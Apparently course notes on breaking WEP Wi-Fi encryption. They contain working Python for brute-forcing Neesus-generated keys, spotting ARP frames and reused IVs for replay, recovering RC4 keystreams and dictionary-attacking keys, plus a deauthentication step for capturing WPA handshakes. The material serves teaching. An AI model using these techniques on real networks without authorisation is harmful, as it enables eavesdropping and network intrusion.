This document discusses cracking WEP encryption on wireless networks. It explains that monitor mode lets a wireless card capture every 802.11 frame it can hear, including management and control frames and traffic of networks it is not associated with, and that the card does not decrypt anything in that mode. It also describes how tools such as wep_crack, WEPAttack and aircrack-ng recover the 5- or 13-byte WEP key: by dictionary or brute-force attacks on the passphrase-to-key generator, and by statistical attacks that exploit weaknesses in how WEP uses RC4, fed by large captures of packets with repeated initialization vectors. With enough captured packets, these tools typically recover a WEP key within minutes regardless of passphrase complexity.
3. Wireless card modes:
◦ Managed mode – What is typically used
Card passes only 802.3 (Ethernet-framed) data up to the host
Sniffing in this mode will NOT report management frames,
control frames, or 802.11 wireless-header data
Card will only pass to sniffer data on the network it is connected to
Card automatically decrypts data (it holds the key)
◦ Ad hoc mode – Used to form ad hoc (peer-to-peer) networks
◦ Master mode – Wireless card acts as an access point
◦ Monitor mode (also called RFMON mode) – Passive capture mode;
the card is not associated with any network (injection tools such as
aireplay-ng also use it)
Card in this mode will pass to sniffer ALL frames from ALL
perceived networks (not just connected ones), including
management and control frames
Data not decrypted by card (encrypted payloads arrive as ciphertext)
4. Per-packet encryption key is a concatenation of:
◦ A five or thirteen byte pre-shared key (PSK; could be generated from a
passphrase of some other size)
◦ A three byte, non-secret initialization vector (IV)
Sent in the clear at the front of the packet, followed by one
byte carrying the key index
Varies from packet to packet (but there are only 2^24 values,
so IVs repeat on a busy network)
◦ Order is IV || PSK, giving a 64- or 128-bit RC4 key
RC4 accepts that key and the data length and generates a
pseudorandom keystream (the output of its PRGA stage) the
size of the data
5. Keystream is XORed with the plaintext (plus a four byte CRC-32
integrity check value, the ICV, appended to it) to generate the ciphertext
◦ Recall the following: If C=A⊕B and D=C⊕B, then D=A
◦ So decryption is the same XOR with the same keystream: RC4 is a
symmetric cipher, and whoever knows IV || PSK can regenerate the
keystream
We already know the IV (it is in the packet); all we need to figure out
is the five or thirteen byte PSK
Some WEP problems:
◦ Dictionary attacks work well, since people often use real
words as their passphrases
◦ Weaknesses in the process (the Neesus Datacom
algorithm) commonly used to transform passphrases
into 5-byte PSKs make the effective key length much smaller
than the nominal one: the generator folds the passphrase into a
32-bit seed, only the low 24 bits of that seed ever affect the
output, and ASCII passphrases leave three of those bits zero, so
only about 21 bits (roughly two million seeds) remain instead of 40
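The weakness above is easy to see once the generator is written out. The following is an added illustration for this page, not code from wep_crack or any other tool it names: a re-implementation of the Neesus Datacom 40-bit passphrase-to-key generator (fold the passphrase into a 32-bit seed, run a linear congruential generator, take bits 16..23 of each state), plus a brute-force search that walks only the seeds an ASCII passphrase can actually produce. The 21-bit counter-to-seed mapping and the sample passphrases are this example's own.

```python
# Added example: Neesus Datacom style 40-bit WEP key generator and the
# 21-bit brute force it permits. Not the course's or any tool's own code.
from typing import List, Optional, Tuple

LCG_MULT = 0x343FD
LCG_INC = 0x269EC3


def neesus_seed(passphrase: bytes) -> int:
    """Fold the passphrase into a 32-bit seed: byte i is XORed into seed byte i mod 4."""
    seed = 0
    for i, b in enumerate(passphrase):
        seed ^= b << (8 * (i % 4))
    return seed & 0xFFFFFFFF


def neesus_keys_from_seed(seed: int) -> List[bytes]:
    """Run the LCG and keep bits 16..23 of each state: four 5-byte (40-bit) keys."""
    keys = []
    for _ in range(4):
        key = bytearray()
        for _ in range(5):
            seed = (seed * LCG_MULT + LCG_INC) & 0xFFFFFFFF
            key.append((seed >> 16) & 0xFF)
        keys.append(bytes(key))
    return keys


def neesus_40bit_keys(passphrase: str) -> List[bytes]:
    """Passphrase -> the four keys a vendor 'generate from passphrase' button gives."""
    return neesus_keys_from_seed(neesus_seed(passphrase.encode("ascii")))


# Why only 21 bits matter:
#  * bit k of (seed*LCG_MULT + LCG_INC) depends only on bits 0..k of seed, and
#    the generator outputs bits 16..23, so seed bits 24..31 never reach a key;
#  * printable ASCII has its top bit clear, so seed bits 7, 15 and 23 are
#    always zero. 32 - 8 - 3 = 21 bits, i.e. 2**21 reachable seeds.
def counter_to_seed(n: int) -> int:
    """Map a 21-bit counter onto the seeds an ASCII passphrase can produce
    (the mapping is this example's own device for enumerating them)."""
    return (n & 0x7F) | (((n >> 7) & 0x7F) << 8) | (((n >> 14) & 0x7F) << 16)


def brute_force_40bit(target_key: bytes) -> Optional[Tuple[int, int]]:
    """Search all 2**21 reachable seeds; return (seed, key_index) of the first
    seed whose four keys include target_key, or None."""
    for n in range(1 << 21):
        seed = counter_to_seed(n)
        for idx, key in enumerate(neesus_keys_from_seed(seed)):
            if key == target_key:
                return seed, idx
    return None


def high_byte_is_irrelevant(seed: int) -> bool:
    """Demonstrate the first weakness: seeds differing only in bits 24..31 give identical keys."""
    return neesus_keys_from_seed(seed) == neesus_keys_from_seed(seed & 0x00FFFFFF)
```

The full search is about two million seeds with twenty LCG steps each, which is why wep_crack can finish in seconds even in a scripting language; a passphrase whose seed is small (a single short word) is found almost immediately because the counter walks seeds in increasing order.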
6. Use a packet sniffer such as Wireshark,
airodump-ng or Kismet to capture data
◦ WNIC should be in monitor mode
◦ Need a sufficient number of packets with duplicate IVs; to get them:
Listen long enough (IVs are only 24 bits, so repeats are inevitable)
Generate IVs by capturing and replaying a broadcast (e.g., an ARP
request): the AP rebroadcasts each replayed copy under a fresh IV,
and the host being asked replies, producing still more traffic
Can guess that an encrypted frame is an ARP request if it is a
broadcast with a 28-byte payload: 24-byte 802.11 header + 4-byte
IV/key-index + 8-byte LLC/SNAP header + 28-byte ARP + 4-byte ICV
= 68 byte total frame length
Can use aireplay-ng (its ARP request replay attack, -3) to retransmit
◦ With sufficient network traffic, ANY WEP key
(regardless of passphrase complexity) can be recovered, because the
statistical attacks work on captured IV/ciphertext pairs, not on the
passphrase
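The size rule and the IV-reuse count above can both be checked without knowing the key, because the 802.11 header, the IV and the frame length are all sent in the clear. The following is an added example for this page, not code from airodump-ng or aireplay-ng: it parses the header of a raw 802.11 data frame, flags probable WEP-encrypted ARP requests by the 68-byte rule, and counts IVs that appear more than once for a BSSID. The sample capture is constructed inline (filler bytes stand in for the RC4 output, since only lengths and header fields matter here), and the MAC addresses are made up.

```python
# Added example: classify raw 802.11 data frames and count reused IVs using
# only cleartext fields. Illustration for this page, not any tool's code.
from collections import Counter
from typing import Dict, List, Optional

BROADCAST = b"\xff" * 6
MAC_HDR_LEN = 24      # 3-address data frame: FC(2) Dur(2) A1 A2 A3 (6 each) Seq(2)
WEP_IV_LEN = 4        # 3-byte IV + 1 byte holding the key index
LLC_SNAP_LEN = 8
ARP_LEN = 28
ICV_LEN = 4
ARP_FRAME_LEN = MAC_HDR_LEN + WEP_IV_LEN + LLC_SNAP_LEN + ARP_LEN + ICV_LEN  # 68


def parse_data_frame(frame: bytes) -> Optional[Dict]:
    """Return protected flag, destination, BSSID and IV of an 802.11 data frame, else None."""
    if len(frame) < MAC_HDR_LEN:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:                 # type: 0 mgmt, 1 control, 2 data
        return None
    to_ds, from_ds = bool(fc1 & 0x01), bool(fc1 & 0x02)
    protected = bool(fc1 & 0x40)              # "Protected Frame" (WEP) bit
    if to_ds and from_ds:                     # 4-address WDS frame: not handled here
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    # Client -> AP (ToDS):   Addr1 = BSSID, Addr3 = destination
    # AP -> client (FromDS): Addr1 = destination, Addr2 = BSSID
    # Ad hoc (neither):      Addr1 = destination, Addr3 = BSSID
    if to_ds:
        dst, bssid = addr3, addr1
    elif from_ds:
        dst, bssid = addr1, addr2
    else:
        dst, bssid = addr1, addr3
    iv = None
    if protected:
        if len(frame) < MAC_HDR_LEN + WEP_IV_LEN + ICV_LEN:
            return None
        iv = frame[MAC_HDR_LEN:MAC_HDR_LEN + 3]
    return {"protected": protected, "dst": dst, "bssid": bssid, "iv": iv}


def is_probable_arp_request(frame: bytes) -> bool:
    """Broadcast, WEP-protected and exactly 68 bytes: almost certainly an ARP request."""
    info = parse_data_frame(frame)
    return bool(info and info["protected"] and info["dst"] == BROADCAST
                and len(frame) == ARP_FRAME_LEN)


def reused_ivs(frames: List[bytes], bssid: bytes) -> Dict[bytes, int]:
    """IVs seen more than once in protected data frames of one BSSID, with counts."""
    counts: Counter = Counter()
    for f in frames:
        info = parse_data_frame(f)
        if info and info["protected"] and info["bssid"] == bssid:
            counts[info["iv"]] += 1
    return {iv: n for iv, n in counts.items() if n > 1}


def build_wep_frame(src: bytes, dst: bytes, bssid: bytes, iv: bytes,
                    plaintext_len: int, to_ds: bool = True) -> bytes:
    """Constructed sample frame: a protected data frame whose encrypted part
    covers plaintext_len bytes (zero filler stands in for the ciphertext)."""
    fc1 = 0x40 | (0x01 if to_ds else 0x02)    # Protected + ToDS or FromDS
    addrs = (bssid, src, dst) if to_ds else (dst, bssid, src)
    hdr = bytes([0x08, fc1]) + b"\x00\x00" + b"".join(addrs) + b"\x00\x00"
    return hdr + iv + b"\x00" + bytes(plaintext_len) + b"\x00" * ICV_LEN


def sample_capture() -> List[bytes]:
    """Constructed capture (addresses made up): a client's ARP request, the AP's
    rebroadcast of it under a fresh IV, an unrelated unicast frame, and a
    replayed copy of the first frame (same IV, as aireplay-ng would send it)."""
    ap = bytes.fromhex("001122334455")
    sta = bytes.fromhex("66778899aabb")
    other = bytes.fromhex("ccddeeff0011")
    arp_len = LLC_SNAP_LEN + ARP_LEN
    return [
        build_wep_frame(sta, BROADCAST, ap, b"\x10\x20\x30", arp_len, to_ds=True),
        build_wep_frame(sta, BROADCAST, ap, b"\x10\x20\x31", arp_len, to_ds=False),
        build_wep_frame(sta, other, ap, b"\x10\x20\x32", 100, to_ds=True),
        build_wep_frame(sta, BROADCAST, ap, b"\x10\x20\x30", arp_len, to_ds=True),
    ]
```

Note that the replayed frame itself reuses the client's IV; it is the access point's rebroadcast of each replayed copy, and the victim's replies, that bring new IVs into the capture, which is what the cracking tools need.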
7. wep_crack
◦ Can brute force any 5-byte PSK generated by the Neesus Datacom
algorithm in under ten seconds (the search space is only about 2^21 seeds)
◦ Does NOT work with 13-byte PSKs
WEPAttack
◦ Works with 5-byte and 13-byte PSKs
◦ Dictionary attack
Tries the Neesus Datacom algorithm on each word
Tries truncating or padding dictionary words to 5 and 13 bytes and
using the result directly as the key
Aircrack-ng
◦ Utilizes the fact that there is known plaintext inside every encrypted
data packet (the 802.2 LLC/SNAP header starts with hex AA AA 03),
which yields the first keystream bytes for each IV
◦ Utilizes the duplicated and statistically weak IVs (the FMS/KoreK
and PTW key-recovery attacks)
◦ Can crack 13-byte PSKs in about two minutes with a 95% success
rate given 85,000 captured packets with distinct IVs (the PTW
attack's figure; the more packets captured, the higher the success
rate)
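To make the pieces of items 4, 5 and 7 concrete (the IV || PSK key, the XOR with the RC4 keystream, the known LLC/SNAP plaintext, and what a reused IV gives away), the following is an added example for this page, not code from aircrack-ng, WEPAttack or the course: a minimal WEP encryptor/decryptor on top of a from-scratch RC4, a known-plaintext keystream recovery, a decryption of a second packet under a reused IV without the key, and a dictionary check that confirms a candidate key by verifying the ICV. The key, IV, packet contents and the null-padding rule for short dictionary words are this example's own assumptions.

```python
# Added example: WEP encryption, known-plaintext keystream recovery, IV reuse
# and ICV-based key confirmation. Not the course's or any tool's own code.
import binascii
import struct
from typing import List, Optional

# First six bytes of the 802.2 LLC/SNAP header that starts every WEP data
# payload; the EtherType that follows (0x0806 ARP, 0x0800 IP) is usually
# guessable from the frame length.
LLC_SNAP_KNOWN = bytes.fromhex("aaaa03000000")


def rc4_keystream(key: bytes, length: int) -> bytes:
    """From-scratch RC4: key scheduling (KSA), then `length` PRGA output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", binascii.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(psk: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Body = IV || key-id byte || RC4(IV || PSK) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(psk) in (5, 13)
    data = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(data, rc4_keystream(iv + psk, len(data)))


def wep_decrypt(psk: bytes, body: bytes) -> Optional[bytes]:
    """Regenerate the keystream from IV || PSK; return plaintext only if the ICV verifies."""
    iv, ct = body[:3], body[4:]
    data = xor(ct, rc4_keystream(iv + psk, len(ct)))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == tag else None


def keystream_from_known_plaintext(body: bytes, known: bytes = LLC_SNAP_KNOWN) -> bytes:
    """C XOR P = keystream: the known header bytes give the first keystream bytes for this IV."""
    return xor(body[4:4 + len(known)], known)


def decrypt_with_reused_iv(ref_body: bytes, ref_plaintext: bytes, target_body: bytes) -> bytes:
    """Two bodies under the same IV share a keystream, so the keystream recovered
    from one packet's (known or guessed) plaintext decrypts the other for as
    many bytes as that plaintext covers. No key involved."""
    assert ref_body[:3] == target_body[:3], "different IVs, different keystreams"
    ks = xor(ref_body[4:], ref_plaintext)
    return xor(target_body[4:], ks)


def candidate_keys(word: str) -> List[bytes]:
    """Raw candidates in the WEPAttack spirit: the word truncated or padded to
    5 and 13 bytes (null padding is an assumption made for this demo)."""
    w = word.encode("ascii", "ignore")
    return [(w + bytes(n))[:n] for n in (5, 13)]


def dictionary_attack(body: bytes, words: List[str]) -> Optional[bytes]:
    """Try each candidate key; a key is confirmed when the decrypted ICV checks out."""
    for word in words:
        for key in candidate_keys(word):
            if wep_decrypt(key, body) is not None:
                return key
    return None


def demo() -> dict:
    """Constructed packets: an ARP-sized packet and a second packet encrypted
    under the same IV with the same (made-up) 13-byte key."""
    psk = b"secret-key-13"
    iv = b"\x01\x02\x03"
    arp_plain = LLC_SNAP_KNOWN + b"\x08\x06" + bytes(range(28))   # 28 bytes stand in for ARP
    other_plain = LLC_SNAP_KNOWN + b"\x08\x00" + b"hello, same IV"
    p_arp = wep_encrypt(psk, iv, arp_plain)
    p_other = wep_encrypt(psk, iv, other_plain)
    return {
        "roundtrip": wep_decrypt(psk, p_arp) == arp_plain,
        "keystream_ok": keystream_from_known_plaintext(p_arp) == rc4_keystream(iv + psk, 6),
        "recovered": decrypt_with_reused_iv(p_arp, arp_plain, p_other)[:len(other_plain)],
        "dict_hit": dictionary_attack(p_arp, ["password", "secret-key-13"]),
    }
```

The recovery in `decrypt_with_reused_iv` is exactly the C=A⊕B, D=C⊕B identity from item 5 applied twice: the reference packet gives the keystream, and the keystream gives the second plaintext. Aircrack-ng goes further than this example, using the first keystream byte of many IVs statistically to recover the PSK itself.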
8. Inputs for a dictionary attack on a WPA/WPA2-PSK network:
◦ Basic Service Set Identifier (BSSID) – WAP's MAC address
◦ Extended Service Set Identifier (ESSID) – network's name (needed
because the key is derived from the passphrase and the ESSID together)
◦ Station (client) MAC address
◦ A dictionary, possibly customized
◦ Packet capture of the initial (four-way) handshake; to get one:
Wait for someone to connect to the network, or
Issue a deauth DoS (e.g., with aireplay-ng's deauthentication attack,
-0, or airdrop-ng) to force an already connected client to reconnect
and redo the handshake
To sniff the communication, use a program such as:
airodump-ng
Wireshark
Kismet
[Figure: WEP encryption/decryption diagram. Image taken from http://www.airtightnetworks.com/uploads/pics/Encryption_Decryption_WEP_01.png]
The use of keys in WPA and WPA2 is complex and beyond the scope of this course. If you are interested in reading about it, a good resource is available at http://www.og150.com/assets/Wireless%20Pre-Shared%20Key%20Cracking%20WPA,%20WPA2.pdf (Just be warned that they are hawking a product.)